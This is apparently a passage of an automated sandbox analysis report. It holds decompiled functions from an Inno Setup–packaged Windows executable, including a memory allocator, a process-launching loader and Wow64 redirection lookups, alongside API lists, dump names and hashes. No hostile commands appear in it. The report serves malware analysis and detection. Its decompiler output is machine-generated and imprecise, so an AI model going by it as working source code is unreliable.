						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E004014D8(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E004014D8(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x413a3c - 0x13ffe0;
							if( *0x413a3c != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00401578(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x413a3c = 0x13ffe0;
								 *0x413a38 = _t82;
								 *0x413a34 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x413a34 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00401518(_t106, _t88, _t81);
							 *0x413a34 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 8) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 4);
							 *(__edx + 0x14) = __ebx;
							 *(__edx + 4) = __ecx;
							 *(__ecx + 0x14) = __edx;
							 *(__ebx + 4) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}

0x00401c7c
0x00401c7c
0x00401c85
0x00401c8b
0x00401d74
0x00401d77
0x00401e64
0x00401e65
0x00401e68
0x00401708
0x0040170a
0x0040170c
0x00401711
0x00401714
0x00401719
0x0040171d
0x00401723
0x00401727
0x0040172d
0x00401749
0x0040174d
0x00401750
0x00401750
0x00401752
0x0040175a
0x00401767
0x0040176c
0x0040176e
0x00401770
0x00401773
0x00401773
0x00401775
0x00401779
0x0040177b
0x0040177d
0x0040177f
0x00000000
0x0040177f
0x00000000
0x0040177b
0x0040172f
0x00401737
0x0040173e
0x00401744
0x00401740
0x00401740
0x00401740
0x0040173e
0x00401783
0x00401785
0x0040178e
0x00401797
0x00401797
0x0040179a
0x004017aa
0x00401e6e
0x00401e73
0x00401e73
0x00000000
0x00000000
0x00000000
0x00401c91
0x00401c91
0x00401c93
0x00401c95
0x00401cf8
0x00401cf8
0x00401cfd
0x00401d01
0x00000000
0x00000000
0x00401d03
0x00401d05
0x00401d0c
0x00000000
0x00401d0e
0x00401d12
0x00401d17
0x00401d18
0x00401d19
0x00401d1e
0x00401d22
0x00401d2c
0x00401d31
0x00401d32
0x00000000
0x00401d32
0x00401d22
0x00000000
0x00401d0c
0x00401cf8
0x00401c97
0x00401c97
0x00401c97
0x00401c97
0x00401c9b
0x00401c9e
0x00401ccc
0x00401cce
0x00401ce3
0x00401ce3
0x00401cd0
0x00401cd0
0x00401cd3
0x00401cd6
0x00401cd9
0x00401cdc
0x00401cde
0x00401ce1
0x00000000
0x00000000
0x00401ce1
0x00401ce6
0x00401ce8
0x00401cea
0x00401ced
0x00401d7d
0x00401d80
0x00401d82
0x00401d84
0x00401d85
0x00401d87
0x00401d38
0x00401d38
0x00401d3d
0x00401d45
0x00000000
0x00000000
0x00401d47
0x00401d49
0x00401d50
0x00000000
0x00401d52
0x00401d54
0x00401d59
0x00401d5e
0x00401d66
0x00401d6a
0x00000000
0x00401d6a
0x00401d66
0x00000000
0x00401d50
0x00401d38
0x00401d89
0x00401d89
0x00401d91
0x00401d95
0x00401dcc
0x00401dcf
0x00401dd2
0x00401dd4
0x00401dda
0x00401ddc
0x00401ddc
0x00401d97
0x00401d97
0x00401d97
0x00401d9a
0x00401d9a
0x00401d9e
0x00401da2
0x00401de4
0x00401de7
0x00401de9
0x00401deb
0x00401df1
0x00401df5
0x00401df5
0x00401df1
0x00401da4
0x00401daa
0x00401dfc
0x00401e06
0x00401e34
0x00401e3a
0x00401e3f
0x00401e46
0x00401e50
0x00401e56
0x00401e5d
0x00401e61
0x00401e08
0x00401e08
0x00401e0b
0x00401e0d
0x00401e10
0x00401e13
0x00401e15
0x00401e24
0x00401e29
0x00401e2c
0x00401e30
0x00401e30
0x00401dac
0x00401daf
0x00401db2
0x00401dba
0x00401dbf
0x00401dc6
0x00401dca
0x00401dca
0x00401ca0
0x00401ca0
0x00401ca2
0x00401ca8
0x00401cab
0x00401cb4
0x00401cb7
0x00401cba
0x00401cbd
0x00401cc0
0x00401cc3
0x00401cc6
0x00401cc6
0x00401cc8
0x00401cc9
0x00401cad
0x00401cad
0x00401cad
0x00401caf
0x00401cb1
0x00401cb2
0x00401cb2
0x00401cab
0x00401c9e

APIs

Sleep.KERNEL32(00000000,?,?,00000000,004018EE), ref: 00401D12
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,004018EE), ref: 00401D2C

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: ecfed8f1ed0807f6ccd603253e02b2531eae0721a97c3b398313b2851d848f78
Instruction ID: 467b249c574562f1bac75438b18abd5afc4c200c530fec1930f0d5df439eec02
Opcode Fuzzy Hash: ecfed8f1ed0807f6ccd603253e02b2531eae0721a97c3b398313b2851d848f78
Instruction Fuzzy Hash: 9B71E1316452408BE715DF29CA84B66BBD4AF85314F18827FE848AB3F2D778D8418799

Uniqueness

Uniqueness Score: -1.00%

Function 00411C7F, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00411C7F(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				intOrPtr _t19;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x41865c; // 0x0
				 *0x41865c = 0;
				E00403894(_t17);
				_t19 =  *0x415b48; // 0x400000
				_t21 = E004068EC(0, L"STATIC", 0, _t19, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x412af0 = _t21;
				_t22 =  *0x412af0; // 0xc025e
				 *0x418654 = SetWindowLongW(_t22, 0xfffffffc, E0040EAC4);
				_t25 =  *0x412af0; // 0xc025e
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x418664; // 0x4264f0
				_t4 = _t26 + 0x20; // 0x619dc9
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x418664; // 0x4264f0
				_t7 = _t28 + 0x24; // 0x1da00
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E004082D4(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x418658);
				_push(0x411f5c);
				E0040B84C(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E0040513C(_t73 - 0x3c, 4, __edi);
				_t36 =  *0x418670; // 0x0, executed
				E0040EB50(_t36, __ebx, 0x412aec,  *((intOrPtr*)(_t73 - 0x3c)), __edi, __esi, __fp0); // executed
				if( *0x412ae8 != 0xffffffff) {
					_t50 =  *0x412ae8; // 0x0
					E0040EA2C(_t50, 0x412aec);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E00411E30);
				_t39 =  *0x41865c; // 0x0
				_t40 = E00403894(_t39);
				if( *0x418670 != 0) {
					_t70 =  *0x418670; // 0x0
					_t40 = E0040E5DC(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x418668 != 0) {
					_t47 =  *0x418668; // 0x0
					_t40 = RemoveDirectoryW(E00404D24(_t47)); // executed
				}
				if( *0x412af0 != 0) {
					_t46 =  *0x412af0; // 0xc025e
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x41864c != 0) {
					_t41 =  *0x41864c; // 0x0
					_t60 =  *0x418650; // 0x10
					_t69 =  *0x40dcc4; // 0x40dcc8
					E00405548(_t41, _t60, _t69);
					_t43 =  *0x41864c; // 0x0
					E00402E20(_t43);
					 *0x41864c = 0;
					return 0;
				}
				return _t40;
			}

0x00411c7f
0x00411c81
0x00411c84
0x00411caf
0x00411cb6
0x00411cbc
0x00411ccf
0x00411ce3
0x00411ce8
0x00411cf4
0x00411cff
0x00411d08
0x00411d0d
0x00411d10
0x00411d14
0x00411d19
0x00411d1c
0x00411d1f
0x00411d23
0x00411d28
0x00411d2b
0x00411d2e
0x00411d3f
0x00411d44
0x00411d47
0x00411d4d
0x00411d55
0x00411d5a
0x00411d65
0x00411d72
0x00411d77
0x00411d83
0x00411d85
0x00411d8a
0x00411d8a
0x00411d91
0x00411d94
0x00411d97
0x00411d9c
0x00411da1
0x00411dad
0x00411dbb
0x00411dc3
0x00411dc3
0x00411dcf
0x00411dd1
0x00411ddc
0x00411ddc
0x00411de8
0x00411dea
0x00411df0
0x00411df0
0x00411dfc
0x00411dfe
0x00411e03
0x00411e09
0x00411e0f
0x00411e14
0x00411e19
0x00411e20
0x00000000
0x00411e20
0x00411e25

APIs

Part of subcall function 004068EC: CreateWindowExW.USER32 ref: 0040692B

SetWindowLongW.USER32 ref: 00411CFA

Part of subcall function 0040B84C: GetCommandLineW.KERNEL32(00000000,0040B88E,?,?,00000000,?,00411D5A,00411F5C,?), ref: 0040B862

Part of subcall function 0040EB50: CreateProcessW.KERNEL32 ref: 0040EBC0
Part of subcall function 0040EB50: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040EC50,00000000,0040EC40,00000000), ref: 0040EBD4
Part of subcall function 0040EB50: MsgWaitForMultipleObjects.USER32 ref: 0040EBED
Part of subcall function 0040EB50: GetExitCodeProcess.KERNEL32 ref: 0040EC01
Part of subcall function 0040EB50: CloseHandle.KERNEL32(?,?,00412AEC,00000001,?,00000000,000000FF,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040EC0A

RemoveDirectoryW.KERNEL32(00000000,00411E30,?,?,?,?,?,?,?,?,?,?,000C025E,000000FC,0040EAC4,00000000), ref: 00411DDC
DestroyWindow.USER32(000C025E,00411E30,?,?,?,?,?,?,?,?,?,?,000C025E,000000FC,0040EAC4,00000000), ref: 00411DF0

Strings

InnoSetupLdrWindow, xrefs: 00411CD7
/SL5="$%x,%d,%d,, xrefs: 00411D3A
STATIC, xrefs: 00411CDC

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3586484885-3001827809
Opcode ID: d8b040ad269f919bf68d133973d5a8c0d91c4dcc8319d04100ed1b2578fb33bc
Instruction ID: bdf286289dcee5fb5ab6c9f927e3d040cb7b6d6cdaac718be8b3363f17973679
Opcode Fuzzy Hash: d8b040ad269f919bf68d133973d5a8c0d91c4dcc8319d04100ed1b2578fb33bc
Instruction Fuzzy Hash: 94413670A002409FD710EBA9ED45BD977E5EB48308F10C53EE501AB2F5DB78A842CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB50, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040EB50(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x40ec25);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x40ec40);
				_push(__eax);
				_push(0x40ec50);
				_push(__edx);
				E0040513C( &_v8, 4, __ecx);
				E00403250( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E00404D24(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E0040E770(0x6a, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E0040EB24();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0xff) == 1);
				E0040EB24();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E0040EC2C);
				return L00404C88( &_v8);
			}

0x0040eb5b
0x0040eb5e
0x0040eb60
0x0040eb62
0x0040eb66
0x0040eb67
0x0040eb6c
0x0040eb6f
0x0040eb72
0x0040eb77
0x0040eb78
0x0040eb7d
0x0040eb86
0x0040eb95
0x0040eb9a
0x0040ebc0
0x0040ebc5
0x0040ebc7
0x0040ebcb
0x0040ebcb
0x0040ebd4
0x0040ebd9
0x0040ebd9
0x0040ebf2
0x0040ebf7
0x0040ec01
0x0040ec0a
0x0040ec11
0x0040ec14
0x0040ec17
0x0040ec24

APIs

CreateProcessW.KERNEL32 ref: 0040EBC0
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,0040EC50,00000000,0040EC40,00000000), ref: 0040EBD4
MsgWaitForMultipleObjects.USER32 ref: 0040EBED
GetExitCodeProcess.KERNEL32 ref: 0040EC01
CloseHandle.KERNEL32(?,?,00412AEC,00000001,?,00000000,000000FF,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040EC0A

Part of subcall function 0040E770: GetLastError.KERNEL32(00000000,0040E817,?,?,00000000), ref: 0040E793

Strings

D, xrefs: 0040EB9A

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: a6ff89ed3a7af871bd8892619289be0b7db995d6aafe0c9dcf50d58a480d1a77
Instruction ID: add36b46b0d196150248f45db4bca9ee2f109f5487918607dc2b216ef53e974e
Opcode Fuzzy Hash: a6ff89ed3a7af871bd8892619289be0b7db995d6aafe0c9dcf50d58a480d1a77
Instruction Fuzzy Hash: 101172716042086AE700EBE6CD42F9FB7ACDF48714F51083BB605F71C1DAB9AD108669

Uniqueness

Uniqueness Score: -1.00%

Function 00411648, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00411648(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _t16;
				intOrPtr _t32;
				intOrPtr _t41;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(_t41);
				_push(0x411712);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				 *0x418518 =  *0x418518 - 1;
				if( *0x418518 < 0) {
					 *0x41851c = E00406728(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64DisableWow64FsRedirection");
					 *0x418520 = E00406728(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x41851c == 0 ||  *0x418520 == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x418524 = _t16;
					E0040B9D0( &_v12);
					E0040B2E0(_v12,  &_v8);
					E00404F98( &_v8, L"shell32.dll");
					E0040AC84(_v8, _t27, 0x8000); // executed
					E0040BF84(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(E00411719);
				return L00404C90( &_v16, 3);
			}

0x00411648
0x0041164b
0x0041164d
0x0041164f
0x00411653
0x00411654
0x00411659
0x0041165c
0x0041165f
0x00411666
0x00411681
0x0041169b
0x004116a7
0x004116b2
0x004116b6
0x004116b6
0x004116b6
0x004116b8
0x004116c0
0x004116cb
0x004116d8
0x004116e5
0x004116f2
0x004116f2
0x004116f9
0x004116fc
0x004116ff
0x00411711

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00411712,?,00000000,00000000,00000000), ref: 00411676

Part of subcall function 00406728: GetProcAddress.KERNEL32(?,0040BDAE), ref: 0040674C

GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00411712,?,00000000,00000000,00000000), ref: 00411690

Part of subcall function 00406728: GetProcAddress.KERNEL32(?,00000000), ref: 0040676E

Strings

Wow64RevertWow64FsRedirection, xrefs: 00411686
kernel32.dll, xrefs: 00411671, 0041168B
Wow64DisableWow64FsRedirection, xrefs: 0041166C
shell32.dll, xrefs: 004116D3

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 2f0755cccddb31bbdbba5d8af8f80745d1cb5ed8f8d4bb57e18a718c238bbcdd
Instruction ID: d7528d1017f4a84dae1ce8805adde9276a30cd3593f776e10bb963afcfd3ed6d
Opcode Fuzzy Hash: 2f0755cccddb31bbdbba5d8af8f80745d1cb5ed8f8d4bb57e18a718c238bbcdd
Instruction Fuzzy Hash: E211C130600209BFD701EBA2D842BCD37A9E745748F61843BF600A73E1DB7D5A858A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004018F8, Relevance: 9.0, APIs: 7, Instructions: 298
sleepCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004018F8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t129 =  *0x41304d; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E0040165C();
								_t99 =  *0x415acc; // 0x415ac8
								 *_t147 = 0x415ac8;
								 *0x415acc = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x415ac4 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x413a34], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4138d5;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x413a34], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t141 = _t125 - 0xb30;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x413a44 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x413a40;
							if((0xfffffffe << _t132 &  *0x413a40) == 0) {
								_t133 =  *0x413a3c; // 0xf5600
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E004015E4(_t125);
								} else {
									_t110 =  *0x413a38; // 0x2585610
									_t109 = _t110 - _t125;
									 *0x413a38 = _t109;
									 *0x413a3c = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x413a34 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x413ac4 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x413a44 + _t142 * 4;
								 *_t80 =  *(0x413a44 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x413a40], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00401518(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							 *(_t159 - 4) = _t125 + 2;
							 *0x413a34 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					__eax =  *(__edx + 0x4138dc) & 0x000000ff;
					__ebx = 0x41205c + ( *(__edx + 0x4138dc) & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4138d5;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 4);
					__eax =  *(__edx + 8);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x10);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0xc);
						if(__eax >  *(__ebx + 0xc)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x41304d;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x413a34], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4138d5;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x413a34], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x413a40;
							__eflags =  *(__ebx + 1) &  *0x413a40;
							if(( *(__ebx + 1) &  *0x413a40) == 0) {
								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
								__edi =  *0x413a3c; // 0xf5600
								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
									__edi = __eax;
									__eax = E004015E4(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x413a34 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x413a38; // 0x2585610
									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x413a3c =  *0x413a3c - __edi;
									 *0x413a38 = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x413a44 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x413a44 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x413ac4 + ( *(0x413a44 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x413a44 + __eax * 4;
									 *_t38 =  *(0x413a44 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x413a40], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00401518(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0xf5606
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x413a34 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
